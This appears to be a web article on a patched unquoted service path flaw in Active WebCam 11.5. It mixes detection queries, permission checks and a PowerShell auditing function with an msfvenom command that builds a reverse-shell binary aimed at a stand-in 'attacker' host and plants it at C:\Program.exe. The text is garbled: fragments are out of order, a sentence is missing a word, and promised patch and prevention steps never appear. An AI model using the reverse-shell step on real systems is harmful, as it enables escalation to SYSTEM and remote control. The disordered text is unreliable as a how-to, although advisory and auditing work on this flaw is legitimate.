Active WebCam 11.5 Unquoted Service Path Patched

Once a path like C:\Program Files\Active Webcam\... is flagged, the tester verifies whether normal users can write to any of the parent directories using the icacls utility: icacls "C:\Program Files"

C:\Program Files\Active WebCam\webcam.exe

C:\Program Files\Active Webcam\awservice.exe

High. A local, unprivileged user can elevate privileges to SYSTEM.

A recently identified unquoted service path vulnerability in Active WebCam 11.5 has been officially patched. Users running versions prior to the patch are strongly advised to update immediately to mitigate potential local privilege escalation risks.

This article provides a comprehensive analysis of the vulnerability, its implications, and how to verify that it has been patched.

What is an Unquoted Service Path Vulnerability?

– e.g., Program.exe using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f exe -o C:\Program.exe

Get-WmiObject win32_service | Where-Object { $_.PathName -notlike '"*' -and $_.PathName -like '* *' } | Select-Object Name, DisplayName, PathName

Because this path contains spaces and is unquoted, Windows attempts to resolve the executable by first looking for C:\Program.exe, then C:\Program Files\Active.exe, and finally the intended C:\Program Files\Active WebCam\WebCam.exe file. An attacker who can create a malicious executable on the C:\ drive or in the C:\Program Files\ folder can hijack the service startup.

Administrators managing multiple endpoints can deploy a quick patch using the Windows sc config command via an elevated command prompt:

When Windows attempts to launch a service, it parses the path string. If spaces exist and there are no quotes, the operating system tries to locate the executable by interpreting the spaces as breaks between the executable and its arguments.
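The resolution order described above can be modelled for auditing. The following is an added example, not code from the article or from the vendor: it reports which locations are tried before the intended binary and the quoted form the service path should carry. The function name Test-UnquotedServicePath and the sample values are assumptions made for illustration.

```powershell
# Added example, not code from the article. Function name and sample values are assumptions.
function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$ImagePath)

    $path = $ImagePath.Trim()
    $result = [pscustomobject]@{
        ImagePath   = $path
        Vulnerable  = $false
        ProbedFirst = @()      # locations tried before the intended binary
        QuotedForm  = $path    # value the service path should carry
    }

    # A path that already starts with a quote is taken as written.
    if ($path.StartsWith('"')) { return $result }

    # Split the executable from its arguments at the first ".exe".
    # Simplification: image paths that do not name an .exe are skipped.
    $m = [regex]::Match($path, '(?i)^(.+?\.exe)(\s.*)?$')
    if (-not $m.Success) { return $result }
    $exe  = $m.Groups[1].Value
    $rest = $m.Groups[2].Value

    # Every space inside the executable portion is a break point where
    # "<prefix>.exe" is tried before the longer path.
    for ($i = 0; $i -lt $exe.Length; $i++) {
        if ($exe[$i] -eq ' ') {
            $result.ProbedFirst += $exe.Substring(0, $i) + '.exe'
        }
    }
    $result.Vulnerable = $result.ProbedFirst.Count -gt 0
    $result.QuotedForm = '"' + $exe + '"' + $rest
    return $result
}

# Constructed sample values; the first is the path discussed in the article.
$samples = @(
    'C:\Program Files\Active WebCam\WebCam.exe',
    '"C:\Program Files\Active WebCam\WebCam.exe"',
    'C:\Windows\system32\svchost.exe -k netsvcs'
)
$samples | ForEach-Object { Test-UnquotedServicePath -ImagePath $_ } | Format-List

# Against live services (services without a PathName are skipped):
# Get-CimInstance Win32_Service | Where-Object PathName |
#     ForEach-Object { Test-UnquotedServicePath $_.PathName } | Where-Object Vulnerable
```

Unlike a plain "contains a space" test, the svchost sample is not flagged, because its only space separates the executable from its arguments.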

This is a vulnerability. It cannot be exploited remotely unless combined with another flaw (e.g., remote code execution that drops a low-priv shell). However, on shared machines, kiosks, or employee workstations, it is a serious risk.

To prevent unquoted service path vulnerabilities entirely across an enterprise:

sc qc "Active Webcam Service"